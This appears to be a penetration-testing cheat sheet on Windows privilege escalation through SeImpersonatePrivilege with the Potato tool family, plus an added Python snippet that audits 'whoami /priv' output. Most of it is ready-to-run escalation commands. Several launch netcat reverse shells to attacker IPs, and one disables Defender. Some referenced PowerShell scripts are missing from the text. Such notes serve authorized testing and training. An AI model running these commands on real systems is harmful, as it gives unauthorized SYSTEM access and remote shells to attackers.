SeImpersonatePrivilege

This method takes advantage of the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege privileges to escalate from a local service account to SYSTEM. These privileges are usually enabled by default when IIS or SQL services are installed.

The status can be checked using the following command:

whoami /priv
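As an added audit example (not code from the original page), the following Python parses the text that whoami /priv prints and reports whether the token holds either of the two privileges this page covers. The sample output is constructed to resemble an IIS application-pool account; note that a "Disabled" state still means the privilege is present in the token.

```python
# Privileges this page discusses: a token holding either one is the precondition for the
# Potato family. "Disabled" still counts: the privilege is present in the token and a
# process can turn it on with AdjustTokenPrivileges.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample of `whoami /priv` output (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: state} parsed from `whoami /priv` output."""
    privs = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("====="):  # separator under the column headers
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        # First column is the privilege name, last column is the State; the
        # multi-word description sits in between and is ignored.
        if len(parts) >= 2 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def impersonation_risk(text):
    """List the impersonation-class privileges the token holds, with their state."""
    privs = parse_whoami_priv(text)
    return sorted((n, s) for n, s in privs.items() if n in IMPERSONATION_PRIVS)


if __name__ == "__main__":
    for name, state in impersonation_risk(SAMPLE_WHOAMI_PRIV):
        print(f"{name}: {state} (held by token; review whether this account needs it)")
```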

HotPotato

It was the first potato and was discovered by Stephen Breen. It can be downloaded from here. DCOM has to be enabled for this attack to work.

Potato.exe -ip [local IP] -cmd [cmd to run] -disable_exhaust true -disable_defender true

JuicyPotato

JuicyPotato is a privilege escalation tool created by Andrea Pierini and Giuseppe Trotta.

A COM server with a unique CLSID is required for exploiting this vulnerability. You can get the CLSID from the predefined list put together by the authors here.

Alternatively, you can also find a CLSID that will work on the target system by using the following series of scripts.

Load the following PS script:

Then use the following script to generate the list of possible CLSIDs:

The following script will then try all the CLSIDs that you generated to find a vulnerable one:

Once we have everything we need, we can use JuicyPotato to elevate privileges by executing Netcat and having it send a reverse shell back to your machine:

JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 192.168.1.11 443" -t *

You can also craft a common executable carrying the payload using tools like "shellter" and have it executed on the target system through JuicyPotato.

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards.

JuicyPotatoNG

This is the next iteration of JuicyPotato and it can be downloaded from here.

.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\temp\nc64.exe 192.168.45.180 4433 -e cmd.exe"

PrintSpoofer64

The executable can be downloaded from here.

.\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

RoguePotato

The executable can be downloaded from here.

.\RoguePotato.exe -r YOUR_IP -e "C:\WRITABLE_DIRECTORY\rs443.exe" -l 9999

GodPotato

The executable can be downloaded from here.

.\GodPotato-NET35.exe -cmd "C:\Users\john\Desktop\rs4444.exe"

SharpEfsPotato

The executable can be downloaded from here.

SharpEfsPotato.exe -p "C:\Windows\system32\cmd.exe" -a "/c C:\temp\nc64.exe 192.168.45.180 4433 -e cmd.exe"